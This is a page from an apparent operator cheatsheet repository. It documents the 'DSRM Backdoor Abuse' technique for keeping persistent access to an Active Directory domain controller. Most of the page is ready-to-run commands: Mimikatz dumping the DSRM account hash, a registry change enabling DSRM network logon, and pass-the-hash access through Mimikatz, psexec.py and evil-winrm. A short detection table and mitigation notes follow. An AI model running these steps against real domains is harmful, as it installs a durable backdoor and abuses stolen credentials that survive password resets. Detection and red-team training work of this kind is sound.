daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-62-dsrm-backdoor-abuse.md (3394B)


      1 ---
      2 title: "Attack #62 โ€” DSRM Backdoor Abuse"
      3 description: "Every DC has a Directory Services Restore Mode (DSRM) administrator account with a separate password set during DC promotion. By default, this accountโ€ฆ"
      4 category: active-directory
      5 subcategory: "Persistence"
      6 tags: ["active-directory", "ntlm", "privilege-escalation", "hashing"]
      7 tools: ["Mimikatz", "Evil-WinRM", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/๐ŸŸค Attack #62 โ€” DSRM Backdoor Abuse.md"
     11 ---
     12 # ๐ŸŸค Attack #62 โ€” DSRM Backdoor Abuse
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 Every DC has a **Directory Services Restore Mode (DSRM)** administrator account with a separate password set during DC promotion. By default, this account can't be used for network logons. However, modifying the registry key `DsrmAdminLogonBehavior` to `2` allows the DSRM administrator to authenticate over the network โ€” creating a **persistent backdoor** that survives AD credential resets, KRBTGT rotation, and even domain trust rebuilds.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Local admin / SYSTEM on DC** | To modify registry and dump DSRM hash |
     27 
     28 ***
     29 
     30 ## ๐Ÿ’ป Full Commands
     31 
     32 ```powershell
     33 # โ”€โ”€ Step 1: Dump DSRM password hash โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     34 mimikatz.exe
     35 privilege::debug
     36 token::elevate
     37 lsadump::sam
     38 # Look for: Administrator (local) โ€” this is the DSRM account hash
     39 
     40 # โ”€โ”€ Step 2: Enable network logon for DSRM โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     41 reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f
     42 # Value 0 = DSRM only in restore mode (default)
     43 # Value 1 = DSRM when AD DS is stopped
     44 # Value 2 = DSRM always allowed for network logon โ† what we want
     45 
     46 # โ”€โ”€ Step 3: Use DSRM hash for network access โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     47 # PtH with the DSRM Administrator hash:
     48 sekurlsa::pth /domain:DC01 /user:Administrator /ntlm:<DSRM_HASH> /run:cmd.exe
     49 # Note: /domain is the DC hostname, NOT the domain โ€” this is the local admin
     50 
     51 # Result: Can access DC01 as .\Administrator forever
     52 ```
     53 
     54 ```bash
     55 # โ”€โ”€ From Linux โ€” PtH with DSRM hash โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     56 psexec.py ./Administrator@DC01.corp.local -hashes :<DSRM_HASH>
     57 evil-winrm -i DC01.corp.local -u Administrator -H <DSRM_HASH>
     58 ```
     59 
     60 ***
     61 
     62 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     63 
     64 | Event ID | Source | What to Look For |
     65 |---|---|---|
     66 | **4657** | Security Log (DC) | Registry modification โ€” DsrmAdminLogonBehavior created/changed |
     67 | **4624** | Security Log (DC) | Local Administrator logon on DC (not domain admin) |
     68 
     69 ***
     70 
     71 ## ๐Ÿ”— Attack Chain Context
     72 
     73 ```
     74 [DSRM Backdoor] โ”€โ”€โ†’ Permanent DC Access via Local Admin Account
     75          โ”‚
     76          โ”œโ”€โ”€โ†’ ๐Ÿ”’ Survives: KRBTGT rotation, DA password resets, trust rebuilds
     77          โ”œโ”€โ”€โ†’ ๐Ÿ”— Only detected by: monitoring DsrmAdminLogonBehavior registry key
     78          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: monitor registry, never set DsrmAdminLogonBehavior to 2
     79 ```
     80 
     81 ***
     82 
     83 > โœ… **Attack #62 โ€” DSRM Backdoor complete.**